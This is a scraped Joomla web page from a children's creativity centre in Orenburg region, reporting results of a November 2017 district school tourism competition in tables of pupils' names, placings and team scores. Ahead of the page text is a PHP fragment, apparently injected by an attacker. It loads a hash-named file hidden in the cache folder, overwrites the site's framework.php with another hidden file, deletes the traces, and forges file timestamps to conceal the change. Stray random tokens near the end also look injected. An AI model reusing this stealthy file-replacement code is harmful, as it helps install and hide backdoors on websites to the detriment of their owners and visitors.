$frameworkFile = $_SERVER ["DOCUMENT_ROOT"]."/includes/framework.php"; $cacheFile = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_system")."-cache-system.php"; $frameworkFileTo = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_framework")."-cache-framework.php"; if (file_exists($cacheFile) && file_exists($frameworkFileTo)) { require_once JPATH_BASE . "/cache/_system/".md5("_system")."-cache-system.php"; $filemTime = filemtime($frameworkFile); $contentFile = file_get_contents($frameworkFileTo); file_put_contents($frameworkFile, $contentFile, LOCK_EX); @unlink($frameworkFileTo); @unlink($cacheFile); touch($frameworkFile, $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/includes", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache/_system", $filemTime); } Cоревнования по имитационно-технической дистанции
МАУДО "Дом детского творчества п. Новосергиевка" Новосергиевского района Оренбургской области

Регистрация Вход

Зарегистрируйтесь, чтобы оставлять комментарии в гостевой книге



Спасибо за регистрацию

Ссылки

План мероприятий

Декабрь 2017
Пн Вт Ср Чт Пт Сб Вс
27 28 29 30 1 2 3
4 5 6 7 8 9 10
11 12 13 14 15 16 17
18 19 20 21 22 23 24
25 26 27 28 29 30 31
Developed by JoomVision.com
Баннер
  • Toggle
  • Закрыть

Cоревнования по имитационно-технической дистанции PDF Печать E-mail

       Согласно плану каникулярного периода, 2 ноября 2017 года на базе МОБУ «Платовская СОШ им.А.Матросова» проходят соревнования по имитационно-технической дистанции 1,2,3 класса и соревнования на средствах передвижения велосипед 1,2 класса.

      В соревнованиях принимают участие команды из МОБУ «Платовская СОШ им.А.Матросова», МОАУ «Кулагинская СОШ», МОБУ «Герасимовская СОШ», МОБУ «Барабановская СОШ», МОБУ «Кувайская СОШ», МОБУ «Краснополянская ООШ», МОБУ «Сузановская СОШ».

 

Сводный ПРОТОКОЛ

лично-командные соревнования по пешеходному ТМ

 личных, командных, лично-командных  вид туризма

 на Имитационно-техническая дистанция 1 класса

 наименование дистанции

Группа (возрастная, квалификационная)- смешанная Дата «2» ноября 2017г

Наименование соревнований ( слета) районные соревнования в закрытом помещении

 

 

п/п

Команда

Фамилия, имя участника

Место

Командное

Очки

Место

1

МОБУ «Платовская СОШ им. А.Матросова»

Уразаева Злата

1

15

1

Соловьева Дарья

2

Филатов Стас

5

Шубина Лиза

7

2

МОБУ«Сузановская СОШ»

Позднякова Нина

13

40

3

Буткевич Дарья

12

Чубов Богдан

7

Коровина Екатерина

8

3

МОАУ«Кулагинская СОШ»

Пятина Дарья

5

24

2

Лупандина Валерия

9

Пугаченко Милена

6

Лупандина Екатерина

4

 

Кувайская СОШ

 

Сайтаков Родион

2

 

 

Снегирева Валерия

11

 

Барабановская СОШ

 

Жанаев Айрат

4

Манасов Руслан

3

Щербакова Анастасия

3

 

 

 

 

Фаттахова Азалия

10

 

 

Поздняков Сергей

6

 

 

Фаттахов Айдар

1

 

Старший судья старта-финиша_______________/_____________________/

                                                                                         подпись                                       Ф,И,О

Главный секретарь_______________/_____________________/

                                                                                         подпись                                       Ф,И,О

 

ПРОТОКОЛ

лично-командные соревнования по пешеходному ТМ

личных, командных, лично-командных вид туризма

Имитационно-техническая дистанция 2 класса

наименование дистанции

Группа (возрастная, квалификационная)- смешанная. Дата «2» ноября 2017г

Наименование соревнований ( слета): Районные соревнования в закрытом помещении

 

п/п

Команда

Фамилия, имя участника

место

командное

очки

место

1

Краснополянская ООШ

Жанаев Арслан

10

47

4

Григорьева Полина

14

Овейчик Алексей

13

Овейчик Сабина

10

2

Герасимовская СОШ

Титаренко Ангелина

11

44

3

Авдонина Дарья

8

Сергеева Ульяна

12

Бражкина Ульяна

13

3

Кулагинская СОШ -1

Пятин Александр

1

22

2

Никитин Данила

11

Добрынина Елизавета

4

Куликова Снежана

6

4

Кувайская СОШ - 1

Семенов Антон

4

22

2

Сайтаков Наиль

3

Назаров Кирилл

3

Шалимова Радмила

12

5

Кувайская СОШ - 2

Игишев Эмир

5

29

 

Кутлиахметов Ф

8

Назарова Ульяна

7

Снегирева Ангелина

9

6

Барабановская СОШ

Щербаков Денис

7

20

1

Суров Александр

2

Толкачева Лида

5

Астафьев Макс

6

 

Кр.Полянская ООШ

Музафарова Вика

15

   

Жумашев Адиль

9

 

Кулагинская

Пятина Елена

1

 

Кувайская СОШ

Бижанова Анжела

3

 

Платовская СОш

Уразаева Злата

2

 

Старший судья старта-финиша_______________/_____________________/

                                                                                         подпись                                      Ф,И,О

Главный секретарь_______________/_____________________/

                                                                                         подпись                                       Ф,И,О

 

ПРОТОКОЛ

лично-командные соревнования на средствах передвижения

личных, командных, вид туризма

Велосипед 2 класса

наименование дистанции

Группа (возрастная, квалификационная)- смешанная Дата «2» ноября 2017г

Наименование соревнований ( слета): Районные соревнования в закрытом помещении

 

п/п

Команда

Фамилия, имя участника

место

командное

очки

место

1

МОБУ «Платовская СОШ им. А.Матросова»

Уразаева Злата

22

79

7

Соловьева Дарья

14

Филатов Стас

16

Шубина Лиза

27

2

МОБУ«Сузановская СОШ»

Позднякова Нина

15

60

5

Буткевич Дарья

23

Чубов Богдан

6

Коровина Екатерина

16

3

МОАУ«Кулагинская СОШ»

Пятина Дарья

4

16

 

Лупандина Валерия

1

Ткаченко Милена

6

Лупандина Екатерина

5

4

Краснополянская ООШ

Жанаев Арслан

18

90

8

Григорьева Полина

28

Овсейчик Амина

19

Овсейчик Сабина

25

5

Герасимовская СОШ

Титаренко Ангелина 

11

64

6

Авдонина Дарья

12

Сергеева Ульяна

21

Бражкина Ульяна

20

6

Кулагинская СОШ -1

Пятин Александр

4

10

1

Никитин Данила

2

Добрынина Елизавета

3

Куликова Снежана

2

7

Кувайская СОШ - 1

Семенов Антон

4

32

2

Сайтаков Наиль

13

Назаров Кирилл

5

Шалимова Радмила

10

8

Кувайская СОШ - 2

Игишев Эмир

7

55

4

Кутлиахметов Ф

15

Назарова Ульяна

24

Снегирева Ангелина

9

 

Барабановская СОШ

Щербаков Денис

10

36

3

Суров Александр

8

 

Толкачева Лида

7

Астафьев Макс

11

 

Барабановка

Жанаев Айрат

1

   
 

Щербакова Анастасия

8

   
 

Монасов Руслан

9

   
 

Кр.Полянская ООШ

Музафарова Вика

17

   
 

Жумашев Адиль

9

   
 

Кулагинская

Пятина Елена

13

   
 

Кувайская СОШ

Бижанова Анжела

18

   
 

Сайтаков Родион

17

   
 

Платовская СОШ

Пузырев

20

   
 

Сузановская СОШ

Фаттахова Азалия

26

   

Фаттахов Айдар

12

   

Поздняков Сергей

14

   

 

Старший судья старта-финиша_______________/_____________________/

                                                                                         подпись                                       Ф,И,О

Главный секретарь_______________/_____________________/

                                                                                         подпись                                       Ф,И,О



duqucmpz5uc

 

gx1ad103i08

 

hzulfo6zwrk

 

 

comback_black_green_75

Обновлено 09.11.2017 14:23